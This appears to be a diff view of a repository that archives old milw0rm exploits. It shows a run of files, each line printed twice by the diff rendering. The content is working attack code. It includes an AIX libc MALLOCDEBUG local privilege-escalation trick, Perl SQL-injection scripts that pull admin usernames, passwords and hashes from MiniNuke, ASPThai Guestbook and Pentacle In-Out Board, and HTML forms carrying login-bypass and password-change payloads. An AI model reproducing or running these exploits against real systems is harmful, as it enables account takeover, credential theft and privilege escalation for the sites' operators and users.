PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./" PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH export PATH
exec /tmp/ksh exec /tmp/ksh
# milw0rm.com [2005-03-25] # milw0rm.com [2005-03-25]

66
platforms/aix/local/9306.txt
View file

@ -1,33 +1,33 @@
#!/bin/bash #!/bin/bash
################################################################# #################################################################
# _______ _________ _ # # _______ _________ _ #
# ( ____ )\__ __/( ( /| # # ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | # # | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | # # | (____)| | | | \ | | #
# | __) | | | (\ \) | # # | __) | | | (\ \) | #
# | (\ ( | | | | \ | # # | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | # # | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) # # |/ \__/ )_( |/ )_) #
# http://root-the.net # # http://root-the.net #
################################################################# #################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability # #[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 # #[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> # #[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX # #[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, # #[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull # # str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. # # AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : # # Libs Affected : #
# /usr/ccs/lib/libc.a # # /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a # # /usr/ccs/lib/libp/libc.a #
################################################################# #################################################################
Set the following environment variables: Set the following environment variables:
umask 000 umask 000
MALLOCTYPE=debug MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions." echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30] # milw0rm.com [2009-07-30]

4
platforms/aix/shellcode/13241.txt
View file

@ -35,6 +35,6 @@ unsigned int code[]={
80010444 lwz r0,1092(SP) --jump 80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0 7c0903a6 mtspr CTR,r0
4e800420 bctr --jump 4e800420 bctr --jump
*/ */
# milw0rm.com [2004-09-26] # milw0rm.com [2004-09-26]

6
platforms/asp/webapps/1010.pl
View file

@ -71,6 +71,6 @@ print "User: admin\n";
print "Pass: trapset\n\n"; print "Pass: trapset\n\n";
print "Enjoy ;)\n"; print "Enjoy ;)\n";
print "\n"; print "\n";
### EOF ### ### EOF ###
# milw0rm.com [2005-05-26] # milw0rm.com [2005-05-26]

6
platforms/asp/webapps/1011.php
View file

@ -30,6 +30,6 @@ print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name=
print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">"; print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
print "</form>"; print "</form>";
} }
?> ?>
# milw0rm.com [2005-05-26] # milw0rm.com [2005-05-26]

6
platforms/asp/webapps/1012.txt
View file

@ -33,6 +33,6 @@ size="150">
<br> <br>
<input name="Submit" type="submit" value="Submit"> <input name="Submit" type="submit" value="Submit">
</form> </form>
-----------------End------------------- -----------------End-------------------
# milw0rm.com [2005-05-26] # milw0rm.com [2005-05-26]

6
platforms/asp/webapps/1015.txt
View file

@ -32,6 +32,6 @@ firstname : <input name="firstname" value="Crkchat" type="text" size="50">
<!-- <!--
----------------------------------- -----------------------------------
Now u can use forgot password to gain passwords! --> Now u can use forgot password to gain passwords! -->
# milw0rm.com [2005-05-27] # milw0rm.com [2005-05-27]

6
platforms/asp/webapps/1070.pl
View file

@ -47,6 +47,6 @@ print "Wait For Changing Password ...\n";
print "[+]OK , Now Login With : \n"; print "[+]OK , Now Login With : \n";
print "Username: trapset\n"; print "Username: trapset\n";
print "Password: trapset\n\n"; print "Password: trapset\n\n";
# milw0rm.com [2005-06-27] # milw0rm.com [2005-06-27]

6
platforms/asp/webapps/1071.pl
View file

@ -23,6 +23,6 @@ $page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin
print "[-] Unable to retrieve Username\n" if(!$1); print "[-] Unable to retrieve Username\n" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!"; $page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n"; $page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1); print "[-] Unable to retrieve hash of password\n" if(!$1);
# milw0rm.com [2005-06-27] # milw0rm.com [2005-06-27]

6
platforms/asp/webapps/1112.txt
View file

@ -104,6 +104,6 @@ hostcustid: <input type="TEXT" name="hostcustid" ID="hostcustid" value="1"><tr>
</td> </td>
</tr> </tr>
</table> </table>
</form> </form>
# milw0rm.com [2005-07-18] # milw0rm.com [2005-07-18]

88
platforms/asp/webapps/1252.htm
View file

@ -1,44 +1,44 @@
<!-- <!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address Save this code as .htm and replace [SITE]/[SQLCODE] to your server address
Some SQL Examples: Some SQL Examples:
-Changing character data- -Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';-- update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--
Classcodes arE: Classcodes arE:
0: Dark Wizard 0: Dark Wizard
1: Soul Master 1: Soul Master
16: Dark knight 16: Dark knight
17: Blade knight 17: Blade knight
32: Elf 32: Elf
33: Muse Elf 33: Muse Elf
48: Magic Gladiator 48: Magic Gladiator
64: Dark Lord 64: Dark Lord
Ctlcode is admin level code: Ctlcode is admin level code:
0:Normal 0:Normal
1: Blocked 1: Blocked
8: GM 8: GM
16: GM LVL2 16: GM LVL2
-Blasting Vault- -Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';-- update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--
ITEMCODE is which u can get from itemproject.exe u can find it on google ;) ITEMCODE is which u can get from itemproject.exe u can find it on google ;)
-Changing Account Password- -Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';-- update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy Enjoy
--> -->
<html> <html>
<form action="http://[SITE]/pkok.asp" method="post"> <form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant"> <input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject"> <input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]"> <input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!"> <input type="submit" name="submit" value="Do IT!">
</form> </form>
</html> </html>
# milw0rm.com [2005-10-15] # milw0rm.com [2005-10-15]

118
platforms/asp/webapps/1418.txt
View file

@ -1,59 +1,59 @@
Contacts:{ Contacts:{
ICQ: 10072 ICQ: 10072
MSN/Email: nukedx@nukedx.com MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com Web: http://www.nukedx.com
} }
--- ---
Vendor: MiniNuke (www.miniex.net) Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected. Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp About:Via this method remote attacker can inject SQL query to the news.asp
--- ---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery] How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52 http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Columns of MEMBERS: Columns of MEMBERS:
uye_id = userid uye_id = userid
sifre = md5 password hash sifre = md5 password hash
g_soru = secret question. g_soru = secret question.
g_cevap = secret answer g_cevap = secret answer
email = mail address email = mail address
isim = name isim = name
icq = ICQ Uin icq = ICQ Uin
msn = MSN Sn. msn = MSN Sn.
aim = AIM Sn. aim = AIM Sn.
meslek = job meslek = job
cinsiyet = gender cinsiyet = gender
yas = age yas = age
url = url url = url
imza = signature imza = signature
mail_goster = show mail :P mail_goster = show mail :P
avurl = avatar url avurl = avatar url
avatar = avatar avatar = avatar
--- ---
Vendor: MiniNuke (www.miniex.net) Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected. Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without login. About:Via this method remote attacker can change any users password without login.
--- ---
How&Example: How&Example:
HTML Example HTML Example
[code] [code]
<html> <html>
<title>MiniNuke <= 1.8.2 remote user password change</title> <title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew"> <form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%"> <table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr> <tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr> <tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td> <tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr> <td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td> <tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">&nbsp;&nbsp; <td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">&nbsp;&nbsp;
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr> <input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
</table></form> </table></form>
</html> </html>
[/code] [/code]
# milw0rm.com [2006-01-14] # milw0rm.com [2006-01-14]

106
platforms/asp/webapps/1419.pl
View file

@ -1,53 +1,53 @@
#!/usr/bin/perl #!/usr/bin/perl
# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit. # MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit.
# This exploit uses the vulnerability discovered by nukedx@nukedx.com. # This exploit uses the vulnerability discovered by nukedx@nukedx.com.
# Exploit uses SQl-injection to give you the hash from user with chosen id. # Exploit uses SQl-injection to give you the hash from user with chosen id.
# DetMyl, 2006 Detmyl@bk.ru # DetMyl, 2006 Detmyl@bk.ru
use IO::Socket; use IO::Socket;
if (@ARGV < 3) if (@ARGV < 3)
{ {
print q( print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)] Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128 i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++
); );
exit; exit;
} }
$serv = $ARGV[0]; $serv = $ARGV[0];
$dir = $ARGV[1]; $dir = $ARGV[1];
$uid = $ARGV[2]; $uid = $ARGV[2];
$proxy = $ARGV[3]; $proxy = $ARGV[3];
print "----------------------------------\n"; print "----------------------------------\n";
if ( defined $proxy) { if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg; $proxy =~ s/(http:\/\/)//eg;
($proxyAddr,$proxyPort) = split(/:/, $proxy); ($proxyAddr,$proxyPort) = split(/:/, $proxy);
} }
$serv =~ s/(http:\/\/)//eg; $serv =~ s/(http:\/\/)//eg;
$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid; $request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid;
print "Connecting to: $serv...\n"; print "Connecting to: $serv...\n";
print $proxy?"Using proxy: $proxy \n":""; print $proxy?"Using proxy: $proxy \n":"";
$socket = IO::Socket::INET->new( Proto => "tcp", $socket = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $proxyAddr?"$proxyAddr":"$serv", PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
PeerPort => $proxyPort?"$proxyPort":"80") PeerPort => $proxyPort?"$proxyPort":"80")
|| die "can't connect to: $serv\n"; || die "can't connect to: $serv\n";
print $socket "GET $request HTTP/1.1\n"; print $socket "GET $request HTTP/1.1\n";
print $socket "Host: $serv\n"; print $socket "Host: $serv\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) { if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) {
print "+ Found! The hash for user $uid: $1\n"; print "+ Found! The hash for user $uid: $1\n";
print "----------------------------------\n"; print "----------------------------------\n";
exit(); } exit(); }
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); } if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
} }
print "Exploit failed\n"; print "Exploit failed\n";
print "--------------------------\n"; print "--------------------------\n";
# milw0rm.com [2006-01-14] # milw0rm.com [2006-01-14]

186
platforms/asp/webapps/1472.pl
View file

@ -1,93 +1,93 @@
#!/usr/bin/perl #!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5 # SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
#(And possible higher could not find a site to test it on) #(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text # This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac # Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot. # Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net # http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns email = zodiac@g00ns.net #irc.g00ns.net #g00ns email = zodiac@g00ns.net
#(c) 2006 #(c) 2006
use LWP::UserAgent; use LWP::UserAgent;
use HTTP::Cookies; use HTTP::Cookies;
$Server = $ARGV[0]; $Server = $ARGV[0];
if($Server =~m/http/g) if($Server =~m/http/g)
{ {
$Server=~ 'http://$Server'; $Server=~ 'http://$Server';
print print
} }
else { else {
print $error; print $error;
} }
if(!$Server) {usage();exit() ;} if(!$Server) {usage();exit() ;}
head(); head();
print "\r\nGrabbing Username And Password\r\n\n"; print "\r\nGrabbing Username And Password\r\n\n";
#Login's and stores a cookie to view admin panel later #Login's and stores a cookie to view admin panel later
$xpl = LWP::UserAgent->new() or die; $xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new(); $cookie_jar = HTTP::Cookies->new();
$xpl->agent('g00ns'); $xpl->agent('g00ns');
$xpl->cookie_jar($cookie_jar); $xpl->cookie_jar($cookie_jar);
$res = $xpl->post( $res = $xpl->post(
$Server.'check_user.asp', $Server.'check_user.asp',
Content => [ Content => [
'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', 'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', 'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'Submit' => '-= Login =-', 'Submit' => '-= Login =-',
], ],
); );
# Create a request # Create a request
my $req = HTTP::Request->new(GET => my $req = HTTP::Request->new(GET =>
$Server.'change_admin_username.asp' $Server.'change_admin_username.asp'
); );
$req->header('Referer', $Server.'admin_menu.asp'); $req->header('Referer', $Server.'admin_menu.asp');
my $res = $xpl->request($req); my $res = $xpl->request($req);
$info= $res->content; $info= $res->content;
if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
{ {
die "Error Connecting...\r\n"; die "Error Connecting...\r\n";
} }
#Check the outcome of the response #Check the outcome of the response
$info=~m/(value=\")(\n+|\w+|\W+)/g; $info=~m/(value=\")(\n+|\w+|\W+)/g;
$User = $2; $User = $2;
$info=~m/(value=\")(\n+|\w+|\W+)/g; $info=~m/(value=\")(\n+|\w+|\W+)/g;
$Pass= $2; $Pass= $2;
print "UserName:$User\r\nPassword:$Pass\r\n"; print "UserName:$User\r\nPassword:$Pass\r\n";
sub head() sub head()
{ {
print "\n=======================================================================\r\n"; print "\n=======================================================================\r\n";
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n"; print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";
print "=======================================================================\r\n"; print "=======================================================================\r\n";
} }
sub usage() sub usage()
{ {
head(); head();
print " Usage: Thaisql.pl <Site> \r\n\n"; print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n"; print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
print "=======================================================================\r\n"; print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n"; print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n"; print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
print "=======================================================================\r\n"; print "=======================================================================\r\n";
# milw0rm.com [2006-02-06] # milw0rm.com [2006-02-06]

100
platforms/asp/webapps/1514.pl
View file

@ -1,50 +1,50 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Orginal advisory: http://www.nukedx.com/?viewdoc=9 #Orginal advisory: http://www.nukedx.com/?viewdoc=9
#Usage: mini.pl <victim.com> </mininuke-dir> <userid> #Usage: mini.pl <victim.com> </mininuke-dir> <userid>
use IO::Socket; use IO::Socket;
if(@ARGV != 3){ if(@ARGV != 3){
print " print "
+**********************************************************************+ +**********************************************************************+
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+ +Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
+ Usage: mini.pl <victim> <directory> <userid> + + Usage: mini.pl <victim> <directory> <userid> +
+ Example: mini.pl sux.com / 1 + + Example: mini.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx + + Method found & Exploit scripted by nukedx +
+**********************************************************************+ +**********************************************************************+
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$port = "80"; $port = "80";
$mndir = $ARGV[1]; $mndir = $ARGV[1];
$victimid = $ARGV[2]; $victimid = $ARGV[2];
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid; $sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $mns "GET $sreq\n"; print $mns "GET $sreq\n";
print $mns "Host: $server\n"; print $mns "Host: $server\n";
print $mns "Accept: */*\n"; print $mns "Accept: */*\n";
print $mns "Connection: close\n\n"; print $mns "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
while($answer = <$mns>) { while($answer = <$mns>) {
if ($answer =~ /([\d,a-f]{32})/) { if ($answer =~ /([\d,a-f]{32})/) {
print "+ USERID: $victimid\n"; print "+ USERID: $victimid\n";
print "+ MD5 HASH: $1\n"; print "+ MD5 HASH: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); } exit(); }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n"; print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
print "+ So please edit query by manually adding null data..\n"; print "+ So please edit query by manually adding null data..\n";
exit(); } exit(); }
} }
print "+ Exploit failed\n"; print "+ Exploit failed\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# nukedx.com [2006-02-19] # nukedx.com [2006-02-19]
# milw0rm.com [2006-02-19] # milw0rm.com [2006-02-19]

140
platforms/asp/webapps/1528.pl
View file

@ -1,70 +1,70 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: penta.pl <victim> <directory> #Usage: penta.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=14 #Original Advisory: http://www.nukedx.com/?viewdoc=14
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
+***********************************************************************+ +***********************************************************************+
+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+ +Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
+ Usage: penta.pl <victim> <directory> <userid> + + Usage: penta.pl <victim> <directory> <userid> +
+ Example: penta.pl sux.com / 1 + + Example: penta.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx + + Method found & Exploit scripted by nukedx +
+***********************************************************************+ +***********************************************************************+
"; ";
exit(); exit();
} }
#Local variables #Local variables
$pentaserver = $ARGV[0]; $pentaserver = $ARGV[0];
$pentaserver =~ s/(http:\/\/)//eg; $pentaserver =~ s/(http:\/\/)//eg;
$pentahost = "http://".$pentaserver; $pentahost = "http://".$pentaserver;
$port = "80"; $port = "80";
$pentadir = $ARGV[1]; $pentadir = $ARGV[1];
$pentaid = $ARGV[2]; $pentaid = $ARGV[2];
$pentatar = "newsdetailsview.asp?newsid="; $pentatar = "newsdetailsview.asp?newsid=";
$pentafinal = "login.asp"; $pentafinal = "login.asp";
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes"; $pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp; $pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $pentaserver\n"; print "+ Trying to connect: $pentaserver\n";
$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n"; $penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $penta "GET $pentareq\n"; print $penta "GET $pentareq\n";
print $penta "Host: $pentaserver\n"; print $penta "Host: $pentaserver\n";
print $penta "Accept: */*\n"; print $penta "Accept: */*\n";
print $penta "Connection: close\n\n"; print $penta "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
while($answer = <$penta>) { while($answer = <$penta>) {
if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){ if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n"; print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ USERNAME: $1\n"; print "+ USERNAME: $1\n";
} }
if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?)&nbsp;/) { if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?)&nbsp;/) {
print "+ PASSWORD: $1\n"; print "+ PASSWORD: $1\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n"; print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n"; print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n"; print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n"; print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n"; print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Try another userid maybe this one not the admin.\n"; print "+ Try another userid maybe this one not the admin.\n";
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# nukedx.com [2006-02-25] # nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25] # milw0rm.com [2006-02-25]

72
platforms/asp/webapps/1529.htm
View file

@ -1,36 +1,36 @@
<html> <html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title> <title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
<script language=javascript> <script language=javascript>
function ptxpl(){ function ptxpl(){
if(document.xpl.victim.value=="") { if(document.xpl.victim.value=="") {
alert("Please enter site!"); alert("Please enter site!");
return false; return false;
} }
if(confirm("Are you sure?")) { if(confirm("Are you sure?")) {
xpl.action="http://"+document.xpl.victim.value+"/login.asp"; xpl.action="http://"+document.xpl.victim.value+"/login.asp";
xpl.username.value=document.xpl.username.value; xpl.username.value=document.xpl.username.value;
xpl.userpassword.value=document.xpl.userpassword.value; xpl.userpassword.value=document.xpl.userpassword.value;
xpl.submit(); xpl.submit();
} }
} }
</script> </script>
<strong> <strong>
<font face="Tahoma" size="2"> <font face="Tahoma" size="2">
Fill in the blank !:D<br> Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br> Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br> If Pentacle installed on / just enter host<br>
Example: host.com<br> Example: host.com<br>
Example2: host.com/ptdir/<br> Example2: host.com/ptdir/<br>
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();> <form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50"> Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username" value="any"> <input type="hidden" name="username" value="any">
<input type="hidden" name="userpassword" value="' or '1'='1"> <input type="hidden" name="userpassword" value="' or '1'='1">
<input type="submit" value="Send"> <input type="submit" value="Send">
</table></form> </table></form>
</html> </html>
